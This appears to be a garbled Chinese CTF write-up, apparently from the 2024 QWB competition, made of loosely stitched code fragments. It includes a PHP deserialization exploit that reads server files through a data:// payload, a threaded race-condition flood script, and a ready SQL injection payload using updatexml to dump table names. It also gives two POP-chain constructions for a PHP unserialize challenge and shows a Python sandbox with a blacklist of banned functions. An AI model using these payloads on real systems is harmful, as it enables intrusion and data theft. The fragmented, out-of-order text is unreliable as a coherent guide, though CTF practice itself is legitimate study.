# 提交答案 def submit_answer(url, answer): if answer is not None: response = requests.get(f"{url}/?answer={answer}&Submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2") if response.status_code == 200: print("Answer submitted.") print(response.text) else: print("Failed to submit the answer") else: print("No answer to submit")
# 主函数 def main(): url = "http://192.168.18.28/calc" url2 = "http://192.168.18.28/" problem = get_calculation_problem(url) if problem: answer = calculate_answer(problem) submit_answer(url2, answer)
# patch begin class Remote: """A helper class to send the payload and download files.
The logic of the exploit is always the same, but the exploit needs to know how to download files (/proc/self/maps and libc) and how to send the payload.
The code here serves as an example that attacks a page that looks like:
```php <?php
$data = file_get_contents($_POST['file']); echo "File contents: $data"; Tweak it to fit your target, and start the exploit. """
def send(self, path: str) -> Response: """Sends given `path` to the HTTP server. Returns the response.""" ser = base64.encode(serialize(cls1(cls2(path, ""), ["fileput"]))) return self.session.get(self.url, params={"ser": ser})
或直接修改send
1 2 3 4 5 6 7 8 9 10
def send(self, path: str) -> Response: """Sends given `path` to the HTTP server. Returns the response. """ patch_len = str(len(path)) path = 'O:4:"cls1":2:{s:3:"cls";O:4:"cls2":2:{s:8:"filename";s:'+ patch_len +':"'+ path +'";s:3:"txt";s:0:"";}s:3:"arr";a:1:{i:0;s:7:"fileput";}}' # O:4:"cls1":2:{s:3:"cls";O:4:"cls2":2:{s:8:"filename";s:25:"data://text/plain;base64,";s:3:"txt";s:0:"";}s:3:"arr";a:1:{i:0;s:7:"fileput";}} path = base64.encode(path)
spec = importlib.util.find_spec(module_name) if spec is None: return False
if module_name in sys.builtin_module_names: return True if spec.origin: std_lib_path = os.path.dirname(os.__file__) if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()): return True return False
def verify_secure(m): for node in ast.walk(m): match type(node): case ast.Import: print("ERROR: Banned module ") return False case ast.ImportFrom: print(f"ERROR: Banned module {node.module}") return False return True
def do(source_code): hook_code = ''' def my_audit_hook(event_name, arg): blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"] if len(event_name) > 4: raise RuntimeError("Too Long!") for bad in blacklist: if bad in event_name: raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
''' print('do!') print('Source code: ',source_code) code = hook_code + source_code tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST) try: if verify_secure(tree): with open("run.py", 'w') as f: f.write(code) result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8") os.remove('run.py') return result else: return "Execution aborted due to security concerns." except: os.remove('run.py') return "Timeout!"
def send_request(): while True: r = requests.post(url + "/blockly_json", headers={"Content-Type": "application/json"}, data=json.dumps(data)) text = r.text if "1 10" not in text and "No such file or direct" not in text and len(text) > 10: print(text) os.exit(-1) break
threads = [] num_threads = 100
for _ in range(num_threads): thread = threading.Thread(target=send_request) threads.append(thread) thread.start()
public function search($keyword, $num) { return Db::query( "select * from " . $this->prefix . "book where delete_time=0 and match(book_name,summary,author_name,nick_name) against ('" . $keyword . "' IN NATURAL LANGUAGE MODE) LIMIT " . $num );
search 传 keyword 直接就有 sql 注入
1
?keyword=0') or updatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables)),3) #
function filter($password){ $filter_arr = array("admin","2024qwb"); $filter = '/'.implode("|",$filter_arr).'/i'; return preg_replace($filter,"nonono",$password); } class guest{ public $username; public $value; public function __tostring(){ if($this->username=="guest"){ $value(); } return $this->username; } public function __call($key,$value){ if($this->username==md5($GLOBALS["flag"])){ echo $GLOBALS["flag"]; } } } class root{ public $username; public $value; public function __get($key){ if(strpos($this->username, "admin") == 0 && $this->value == "2024qwb"){ $this->value = $GLOBALS["flag"]; echo md5("hello:".$this->value); } } } class user{ public $username; public $password; public $value; public function __invoke(){ $this->username=md5($GLOBALS["flag"]); return $this->password->guess(); } public function __destruct(){ if(strpos($this->username, "admin") == 0 ){ echo "hello".$this->username; } } } $user=unserialize(filter($_POST["password"])); if(strpos($user->username, "admin") == 0 && $user->password == "2024qwb"){ echo "hello!"; }
法一
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
<?php class root{ public $username; public $value=2024; public $gxngxngxn; } class user{ public $username; public $password; }
$exp = new root(); $exp->gxngxngxn=new user(); $exp->gxngxngxn->username=&$exp->value; echo serialize($exp);
法二
直接构造,手动修改
1 2 3 4 5 6 7 8 9 10 11 12
$obj = new root(); $g1 = new guest(); $g1->username = "admin"; $obj->username = $g1; $u1 = new user(); $u1->username = "2024qwb"; $g1->value = $u1; $obj->value = &$u1->username;
